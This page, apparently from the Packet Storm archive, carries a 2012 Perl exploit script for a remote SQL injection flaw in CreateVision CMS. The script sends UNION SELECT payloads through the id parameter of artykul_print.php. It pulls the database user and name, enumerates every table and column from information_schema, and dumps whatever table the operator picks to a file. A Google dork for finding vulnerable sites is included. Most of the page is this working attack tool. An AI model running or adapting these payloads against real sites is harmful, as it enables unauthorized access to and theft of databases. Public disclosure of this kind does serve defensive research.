exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CreateVision CMS SQL Injection

CreateVision CMS SQL Injection
Posted Feb 25, 2012
Authored by Zwierzchowski Oskar

CreateVision CMS suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | ebd088d94d90a9f803320c16e259a003c877080832b888f520dc7cbbd0cefeaa

CreateVision CMS SQL Injection

Change Mirror Download
#!/usr/local/bin/perl
#
# Exploit Title: CreateVision CMS Database injection.
# Description: Virtually none of the variables are not filtered.
# Google Dork: inurl:artykul_print.php
# Date: 2012/02/24
# Author : Zwierzchowski Oskar
# Software Link: http://www.createvision.pl/
# Version: All Version
# Security Risk: High
# Tested on: FreeBSD
# Greets: Grzegorz Stachowiak, Damian Blaszczyk, Borislav Kotov.
use strict;
use warnings;
use LWP::Simple;
sub main ()
{
my %config = (
'host' => '',
'columns' => ',3,4',
'column' => '',
'table' => ''
);
my %send = ();
getops(\%config);
getcolumn(\%config, \%send);
getuser(\%config, \%send);
getdatabase(\%config, \%send);
gettables(\%config, \%send);
otherdata(\%config, \%send);
return 0;
}
sub getdatabase ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{database};
analizedata($data, 'Database');
return ($config, $send);
}
sub getuser ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{user};
analizedata($data, 'User');
return ($config, $send);
}
sub gettables ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{column};
analizedata($data, 'Tables');
}
sub otherdata ($$)
{
my $config = shift;
my $send = shift;
my $data;
my $table;
my $column;
print "[+]\tIf you want to draw some data? (1 or 2)\r\n\r\n";
print "[1]\tYes\r\n";
print "[2]\tNo\r\n";
$data = <STDIN>;
chomp($data);
if ($data == 2)
{
exit 0;
}
else
{
print "[+]\tName of the table which you want to download (check the output.txt) :\r\n";
$table = <STDIN>;
chomp($table);
print "[+]\tGet column/s: (ex. column1,column2,column3)\r\n";
$column = <STDIN>;
chomp($column);
$column =~ s/,/,char(58),/g;
$send->{tables} = '/artykul_print.php?id=103+and+1=2+union+select+1,concat('.$column.')'.$config->{columns}.'+from+'.$table.'--';
$data = get $config->{host}.$send->{tables};
analizedata($data, 'MYDATA');
}
return 0;
}
sub analizedata ($$)
{
my $data = shift;
my $pref = shift;
my $table;
my $column;
my @columns = ('');
my @tables = ('');
while ($data =~ /<span class=\"tytul_artykulu\">(.*?)<\/span>/g)
{
if ($pref eq 'Tables')
{
($table, $column) = split(/:/, $1);
save($1, 'output.txt');
push(@columns, $column);
if ($table eq $tables[$#tables])
{
}
else
{
push(@tables, $table);
}
}
else
{
print "[+]\t[".$pref."][".$1."]\r\n";
save($1, 'output.txt');
}
}
if ($pref eq 'Tables')
{
print "[+]\t".$#columns." columns in ".$#tables." tables\r\n";
print "[+]\tResults has been saved into output.txt\r\n";
}
return 0;
}
sub getops ($)
{
my $config = shift;
if (!$ARGV[0] || $ARGV[0] !~ /http:\/\//)
{
print "[+]\tUsage: perl splo.pl http://host.com\r\n";
exit 0;
}
else
{
$config->{host} = $ARGV[0];
}
return $config;
}
sub getcolumn ($$)
{
my $config = shift;
my $send = shift;
my $data;
for (1..20)
{
incrcolum($config);
$send->{user} = '/artykul_print.php?id=105+and+1=2+union+select+1,user()'.$config->{columns}.'--';
$send->{database} = '/artykul_print.php?id=105+and+1=2+union+select+1,database()'.$config->{columns}.'--';
$send->{column} = '/artykul_print.php?id=105+and+1=2+union+select+1,concat(table_name,char(58),column_name)'.$config->{columns}.'+from+information_schema.columns--';
$data = get $config->{host}.$send->{user};
if (index($data, "<span class=\"tytul_artykulu\">") != -1)
{
return ($config, $send);
}
}
return $config;
}
sub incrcolum ($)
{
my $config = shift;
my @digits = split(/,/, $config->{columns});
my $data = (($digits[$#digits])+1);
$config->{columns} =~ s/$config->{columns}/$config->{columns},$data/g;
return $config;
}
sub save ($$)
{
my $data = shift;
my $file = shift;
open(FILE, ">>".$file."");
print FILE "".$data."\r\n";
close FILE;
return 0;
}
main();

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close